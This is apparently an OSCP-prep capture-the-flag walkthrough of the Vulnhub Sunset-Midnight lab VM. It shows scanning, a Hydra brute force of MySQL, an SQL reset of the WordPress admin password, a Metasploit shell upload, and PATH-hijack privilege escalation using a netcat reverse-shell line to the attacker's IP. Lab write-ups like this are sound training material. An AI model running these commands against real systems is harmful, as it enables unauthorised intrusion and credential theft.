OSCP Prep — Vulnhub’s Sunset-Midnight Walkthrough
Welcome back! Today we are going through the Midnight VM from Vulnhub.
The creator has deemed this intermediate in difficulty. This box is perfect for getting some experience on SQL queries and brute forcing through a MySQL database.
After completing this box, you will have some skills in traversing SQL databases, getting a reverse shell on a WordPress website, and utilizing Hydra. So enough about the box, let’s get started.
Enumeration
We’ll start off with a standard Nmap scan.
user@kali:~/Desktop$ nmap -A -sV -Pn -p- 192.168.1.202
Starting Nmap 7.80 ( https://nmap.org ) at 2020–09–02 14:22 EDT
Nmap scan report for 192.168.1.202
Host is up (0.052s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 256 fe:eb:ef:5d:40:e7:06:67:9b:63:67:f8:d9:7e:d3:e2 (ECDSA)
|_ 256 35:83:68:2c:33:8b:b4:6c:24:21:20:0d:52:ed:cd:16 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Did not follow redirect to http://sunset-midnight/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
3306/tcp open mysql MySQL 5.5.5–10.3.22-MariaDB-0+deb10u1
| mysql-info:
| Protocol: 10
| Version: 5.5.5–10.3.22-MariaDB-0+deb10u1
| Thread ID: 14
| Capabilities flags: 63486
| Some Capabilities: ConnectWithDatabase, DontAllowDatabaseTableColumn, SupportsLoadDataLocal, IgnoreSigpipes, FoundRows, Support41Auth, ODBCClient, Speaks41ProtocolOld, InteractiveClient, SupportsTransactions, LongColumnFlag, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, SupportsCompression, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
| Status: Autocommit
| Salt: ({Vz%Fp”Tbq2B4{515W8
|_ Auth Plugin Name: mysql_native_password
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.82 seconds
user@kali:~/Desktop$
This shows that we have a couple of open ports:
Port 22 — SSH
Port — 80 Web Server
Port — 3306 MySQL
I like to go through the ports as they are reported by Nmap. We see that the SSH version is OpenSSH 7.9p1 Debian. With minimal research, you can tell that there is not a vulnerability for this.
The web servers seem to be a favorite on these CTFs so let’s see what we can get out of there.
The instructions of the VM already told us to add the VM to our /etc/hosts file, but if you didn’t do that, here is how I did it.
sudo vi /etc/hosts
Esc and then type :wq! and Enter to save the entry.
Now when we browse to the site with the correct address name, we get DNS resolution:
The VM is obviously running WordPress. Doing a Dirb scan gives us a ton of output, but nothing out of the ordinary. The same with Nikto.
user@kali:~/Desktop$ nikto -h http://sunset-midnight
- Nikto v2.1.6
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ Target IP: 192.168.1.202
+ Target Hostname: sunset-midnight
+ Target Port: 80
+ Start Time: 2020–09–03 11:40:37 (GMT-4)
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header ‘link’ found, with multiple values: (<http://sunset-midnight/wp-json/>; rel=”https://api.w.org/",<http://sunset-midnight/>; rel=shortlink,)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header ‘x-redirect-by’ found, with contents: WordPress
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ Entry ‘/wp-admin/’ in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ “robots.txt” contains 2 entries which should be manually viewed.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /wp-app.log: Wordpress’ wp-app.log may leak application/system details.
+ /wordpresswp-app.log: Wordpress’ wp-app.log may leak application/system details.
+ /: A Wordpress installation was found.
+ /wordpress: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wp-content/uploads/: Directory indexing found.
+ /wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wp-login.php: Wordpress login found
+ 7685 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time: 2020–09–03 11:50:06 (GMT-4) (569 seconds)
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
+ 1 host(s) tested*********************************************************************
Portions of the server’s headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)? Nuser@kali:~/Desktop$
The trusty, admin/admin doesn’t work so I went with a WPScan to see if I could brute force my way into the blog with the rockyou.txt wordlist. While I didn’t get into the blog with a password, I did confirm a username.
user@kali:~/Desktop$ wpscan — url http://sunset-midnight — enumerate u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | ‘_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan Team
Version 3.8.4
Sponsored by Automattic — https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]N
[+] URL: http://sunset-midnight/ [192.168.1.202]
[+] Started: Thu Sep 3 11:58:30 2020Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.38 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%[+] http://sunset-midnight/robots.txt
| Interesting Entries:
| — /wp-admin/
| — /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%[+] XML-RPC seems to be enabled: http://sunset-midnight/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| — http://codex.wordpress.org/XML-RPC_Pingback_API
| — https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| — https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| — https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| — https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access[+] http://sunset-midnight/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%[+] Upload directory has listing enabled: http://sunset-midnight/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%[+] The external WP-Cron seems to be enabled: http://sunset-midnight/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| — https://www.iplocation.net/defend-wordpress-from-ddos
| — https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 5.4.2 identified (Latest, released on 2020–06–10).
| Found By: Rss Generator (Passive Detection)
| — http://sunset-midnight/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
| — http://sunset-midnight/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>[+] WordPress theme in use: twentyseventeen
| Location: http://sunset-midnight/wp-content/themes/twentyseventeen/
| Last Updated: 2020–08–11T00:00:00.000Z
| Readme: http://sunset-midnight/wp-content/themes/twentyseventeen/readme.txt
| [!] The version is out of date, the latest version is 2.4
| Style URL: http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo…
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
| Confirmed By: Css Style In 404 Page (Passive Detection)
|
| Version: 2.3 (80% confidence)
| Found By: Style (Passive Detection)
| — http://sunset-midnight/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: ‘Version: 2.3’[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs — Time: 00:00:00 <========================================================================================> (10 / 10) 100.00% Time: 00:00:00[i] User(s) Identified:
[+] admin
| Found By: Author Posts — Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| — http://sunset-midnight/wp-json/wp/v2/users/?per_page=100&page=1
| Oembed API — Author URL (Aggressive Detection)
| — http://sunset-midnight/wp-json/oembed/1.0/embed?url=http://sunset-midnight/&format=json
| Rss Generator (Aggressive Detection)
| Author Id Brute Forcing — Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up[+] Finished: Thu Sep 3 11:58:36 2020
[+] Requests Done: 48
[+] Cached Requests: 9
[+] Data Sent: 11.854 KB
[+] Data Received: 596.468 KB
[+] Memory used: 151.242 MB
[+] Elapsed time: 00:00:05
user@kali:~/Desktop$
From the WPScan output, I was thinking that this could be an XMLRPC vulnerability. However, I couldn’t get it work and determined that it was probably a rabbit hole.
So moved on to the MySQL database. I decided to see if I could brute force my way in using the root username.
hydra -l root -P /usr/share/wordlists/rockyou.txt sunset-midnit mysql -T 4
And we got a hit! Our root password is robert. Let’s log into MySQL and see what we can find.
mysql -h sunset-midnight -u root -p
The first thing we need to do is check out the databases.
show databases;
We have a WordPress database here so we can definitely use this to our advantage.
use wordpress_db;
Now we need to see the tables in the WordPress database.
show tables;
Now we have a few tables that we can dig into. Let’s go for the wp_users table.
select * from wp_users;
I tried decrypting the hash for admin, but was unsuccessful. Since we have root access to the database, we can go ahead and change the admin password then, hopefully, log into the WordPress blog.
Let’s give it a shot. The first thing we need to do is translate a password into MD5 hash format. I’m going with pass123. This is favorite for these types of hacks.
echo -n “pass123” | md5sum;echo “”
UPDATE wp_users SET user_pass=”32250170a0dca92d53ec9624f336ca24" WHERE ID=1;
If you look at the database, we have ID 1 being the admin user. We use the user_pass to change the password and then commit. Pretty simple SQL command.
Now let’s try to log into the WordPress site.
Sweet! We’re in. Since we have the admin password, let’s do something different. I haven’t used Metasploit in a while. Let’s just use the wp_admin_shell_upload module.
msfconsole
use unix/webapp/wp_admin_shell_upload
set RHOSTS sunset-midnight
run
All right! We have a meterpreter shell. Let’s see who we are and what we can do. A simple whoami shows that we are www-data.
This shell is not that great. Let’s try to get a TTY shell with our python one-liner.
python -c ‘import pty; pty.spawn(“/bin/sh”)’
That’s a little better. Browsing up to the /home folder, we see that there is an additional user: jose. There is also a user.txt file that is probably our user flag.
This is telling me that there is an intended way to switch user over to jose. I tried all of the usual sudo tricks, but these were a dead end. Then I remembered that this was running WordPress.
The wp-config.php file is known to display cleartext passwords. So I browsed over and took a look.
cd /var/www/html/wordpress
cat wp-config.php
Scrolling down, I found that jose was part of DB_users.
This shows jose’s password as 645dc5a8871d2a4269d4cbe23f6ae103. We can test this with su.
Let’s go ahead and grab that user.txt file.
Awesome! Let’s go for root now. In order to see what privileges we have let’s run linpeas.sh. The script is located in my Downloads folder so I navigated over there and set up a python server.
Back on the target, I cd’d over to /tmp and transferred the script.
chmod +x linpeas.sh
Then we run the script to check permissions.
./linpeas.sh
The script didn’t give me any easy wins, but a look at the SGID bits showed something curious.
What is /usr/bin/status? If we run the strings command we can take a look.
We see that this calls for the service binary. So, we can set our own service binary to call a NetCat listener back on our home system.
This shell is still a little wonky. Since we already have a cleartext password for Jose, let’s just SSH into the system.
Great! Now we need to find our path.
Now we are going to export /tmp into the path.
export PATH=/tmp/:$PATH
cd /tmp
echo “nc 192.168.1.188 3333 -e /bin/sh” > service
chmod +x service
Now set up a NetCat listener on your Kali box.
nc -lvnp 3333
Now run our binary on the target.
/usr/bin/status
All right! We’re root! Let’s grab the flag!
Awesome! What a fun box! There was a lot here that we got some practice on. The MySQL database commands were perfect for practicing our SQL and the PATH traversal was a good refresher on a time honored privilege escalation method.
If you enjoyed this write-up be sure to follow me here and on twitter @assume_breach. Thanks!